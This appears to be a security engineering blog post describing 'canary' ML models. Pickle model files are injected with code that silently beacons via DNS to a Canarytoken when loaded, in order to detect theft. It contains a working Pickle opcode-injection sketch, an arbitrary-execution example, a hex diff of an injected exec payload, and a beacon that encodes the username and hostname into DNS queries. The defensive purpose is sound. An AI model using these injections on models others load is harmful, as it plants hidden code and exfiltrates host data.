As AI models grow in capability and in the cost of creating them, and as they hold more sensitive or proprietary data, securing them at rest is increasingly important. Organizations are designing policies and tools, often as part of data loss prevention and secure supply chain programs, to protect model weights.
While security engineering discussions tend to focus on prevention (How do we prevent X?), detection (Did X happen?) is an equally critical part of a mature defense-in-depth framework, one that significantly decreases the time required to detect, isolate, and remediate an intrusion. Currently, detection capabilities for AI models are identical to those used for monitoring any other sensitive data; no detection capability focuses on the unique nature of AI/ML.
In this post, we’ll introduce canaries and then show how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. While more secure model formats like safetensors are preferred, there are many reasons that organizations may still support Pickle-backed model files, and building defenses into them is part of a good risk mitigation strategy.
Canaries: lightweight tripwires
At the most basic level, canaries are artifacts left in the environment that no benign user would access. For example, an authorized user typically memorizes their password; it is not common for a user to dig a password out of a credential file and then use those credentials to authenticate to a service on the network.
Security engineers can create a fake credential, leave it someplace discoverable, and generate an alert to investigate its access and usage if the credential is ever used. This is the logic behind Canarytokens. Canaries are relatively fast and simple to generate, require almost no maintenance, can lie dormant in your infrastructure for months, and, when placed properly, produce few false positives.
Thinkst Canary is a security service that helps with the creation and monitoring of canaries. They support a wide range of formats and structures. In this case, we’re focusing on DNS Canarytokens.
Thinkst dynamically generates a unique hostname for each canary token you want to create. If that hostname is queried in DNS, you get an alert. The feature is highly scalable and also offers the capability to create custom domains. While this blog post presents automated canary creation, it's also possible to manually use a free version of Canarytokens or to build and maintain your own canary tracking and alerting system.
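To make the mechanism concrete, the following sketch (with a placeholder hostname, since Thinkst issues a unique one per token) shows that a single DNS resolution of the token's name is enough to fire the alert.

import socket

# Placeholder: Thinkst issues a unique hostname for each DNS Canarytoken.
CANARY_HOSTNAME = "xxxxxxxxxxxx.canarytokens.com"

def beacon(hostname: str = CANARY_HOSTNAME) -> None:
    """
    Trigger the canary by resolving its unique DNS name. The query alone is
    enough: the authoritative name server sees the lookup and raises the alert.
    """
    try:
        socket.getaddrinfo(hostname, None)
    except OSError:
        pass  # Resolution may fail; the DNS query has already been observed.

beacon()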
Machine learning model formats
Recent attention to machine learning security often centers on the deserialization vulnerability of Python Pickle and Pickle-backed file formats. While this obviously includes files ending in .pkl, it can also include files generated by PyTorch or other ML-adjacent libraries such as NumPy.
A user who loads an untrusted Pickle is exposed to arbitrary code execution. Most analysis of this capability has focused on the potential for malware to impact the host or the machine learning system.
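As a brief illustration of why untrusted Pickles are dangerous (a generic example, not tied to any particular model format), the standard __reduce__ hook lets a pickled object nominate an arbitrary callable to run at load time:

import pickle

class Payload:
    """Any pickled object can tell the unpickler to call an arbitrary function."""
    def __reduce__(self):
        # Runs at load time, before the caller ever sees the resulting object.
        return (print, ("arbitrary code ran during pickle.loads",))

malicious_bytes = pickle.dumps(Payload())

# The victim only calls pickle.loads, yet the print call above executes.
pickle.loads(malicious_bytes)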
We asked ourselves: “If we must use models with this (vulner)ability, can we use it for good?”
Machine learning model canaries
It is relatively easy to inject code into a serialized model artifact so that it beacons as a canary when loaded. In our initial research, we used Thinkst DNS Canarytokens to preserve all of the original model functionality while also silently beaconing to Thinkst when the model is loaded.
We can use this either to track usage or to identify that someone is using a model that should never be used (a true canary). If necessary, this alert can trigger an incident response playbook or a hunt operation. Figure 1 shows the workflow from canary generation to an unauthorized user generating an alert.
Figure 1. The Canary Model generation and alerting process
As shown in the following code block, the approach is easy to implement with Thinkst Canary, or it can be adapted to proprietary server-side tracking functionality.
After the new model artifact is generated, it can be placed in a location where authorized users are unlikely to access it. Canaries require very little active monitoring. Set them and forget about them until an alert is triggered.
import os
from pathlib import Path

import requests

# Thinkst Console API key (placeholder: supply via environment or a secrets store).
api_key = os.environ.get("CANARY_API_KEY", "")


def inject_pickle(original: Path, out: Path, target: str) -> None:
    """
    Mock for a function that takes a pickle-backed model file, injects code
    to ping <target>, and writes the result to an output file.
    """
    return


def get_hostname(memo: str) -> str:
    """
    Register a DNS Canarytoken with the Thinkst server and return its hostname.
    """
    url = "https://EXAMPLE.canary.tools/api/v1/canarytoken/create"
    payload = {
        "auth_token": api_key,
        "memo": memo,
        "kind": "dns",
    }
    r = requests.post(url, data=payload)
    return r.json()["canarytoken"]["hostname"]


def upload(file: Path, destination: str) -> None:
    """
    Mock for uploading a file to a destination.
    """
    return


def create_canary(model_file: Path, canary_file: Path, destination: str) -> None:
    """
    Register a new canary with Thinkst and generate a new 'canarified' model.
    """
    host = get_hostname(memo=f"Model Canary at {destination}/{canary_file.name}")
    inject_pickle(model_file, canary_file, host)
    upload(canary_file, destination)


create_canary(Path("model.pkl"), Path("super_secret_model.pkl"), "s3://model-bucket/")
The following diff shows the call to exec injected into the serialized model. This call functions as a beacon to our Canary DNS endpoint when the model is loaded.
< 000001b0: 5496 3949 d7f8 bf94 8694 5294 8c10 5f73 T.9I……R…_s
< 000001c0: 6b6c 6561 726e 5f76 6572 7369 6f6e 948c klearn_version..
< 000001d0: 0531 2e31 2e33 9475 622e .1.1.3.ub.
---
> 000001b0: 5496 3949 d7f8 bf94 8694 5280 0263 5f5f T.9I……R..c__
> 000001c0: 6275 696c 7469 6e5f 5f0a 6578 6563 0a28 builtin__.exec.(
> 000001d0: 637a 6c69 620a 6465 636f 6d70 7265 7373 czlib.decompress
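For reference, here is one way such an injection could be implemented: prepend hand-built pickle opcodes that call exec on a small DNS beacon and then discard the result, leaving the original stream, and the object it returns, untouched. This is a minimal, illustrative sketch of the mock inject_pickle shown earlier, not the exact tooling that produced the diff above, and it assumes the input is a standard Pickle stream.

from pathlib import Path

def inject_pickle(original: Path, out: Path, target: str) -> None:
    """
    Illustrative sketch: prepend opcodes that beacon to <target> on load.
    """
    beacon_src = (
        "import socket\n"
        "try:\n"
        f"    socket.getaddrinfo({target!r}, None)\n"
        "except Exception:\n"
        "    pass\n"
    )
    injected = (
        b"c__builtin__\nexec\n"                      # GLOBAL: push exec onto the stack
        + b"(S" + repr(beacon_src).encode() + b"\n"  # MARK + STRING: the beacon source
        + b"tR0"                                     # TUPLE, REDUCE (call exec), POP the result
    )
    # The original opcodes follow unchanged, so unpickling still returns the model.
    out.write_bytes(injected + original.read_bytes())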
Here’s how it might work in practice. A security engineer creates a canary model file and places it in a private repository. Months later, a Thinkst Canary alert is triggered and an incident response process, tailored towards securing private repositories and sensitive models, is initiated. Leveraging this signal at its earliest stage, defenders can identify, isolate, and remediate the misconfiguration that enabled the unauthorized access.
The basic beacon-on-load functionality is just the beginning, which is the beauty of arbitrary code execution. The technique could be extended to more granular host fingerprinting or other cyber deception operations.
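For example, assuming your alerting endpoint logs the full queried name (and your deception policy permits collecting this data), a beacon could encode a coarse host fingerprint as an extra DNS label. The helper below is hypothetical and illustrative only:

import base64
import getpass
import socket

def fingerprint_beacon(canary_domain: str) -> None:
    """
    Hypothetical extension: encode a coarse host fingerprint into the DNS query itself.
    """
    info = f"{getpass.getuser()}@{socket.gethostname()}"
    # Base32 keeps the label DNS-safe; trim to respect the 63-byte label limit.
    label = base64.b32encode(info.encode()).decode().rstrip("=").lower()[:63]
    try:
        socket.getaddrinfo(f"{label}.{canary_domain}", None)
    except OSError:
        pass  # The query itself is the signal.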
Secure AI strategy
A secure AI strategy can start with secure file formats and strong preventative controls. To mitigate residual risk, consider adding canary functionality to your detection strategy so you are alerted when an unauthorized user accesses proprietary models.
Compared with other defensive controls, canary models are easy to implement, require no maintenance or overhead, and can generate actionable alerts. These techniques move us towards a world where unauthorized users should think twice before searching for, exfiltrating, and executing models.
For more information about AI Security, check out other NVIDIA Technical Blog posts.
Acknowledgment
We would like to recognize the contributions of United States Military Academy Cadet James Ruiz in prototyping Model Canaries during his Academic Individual Advanced Development experience with the NVIDIA AI Red Team.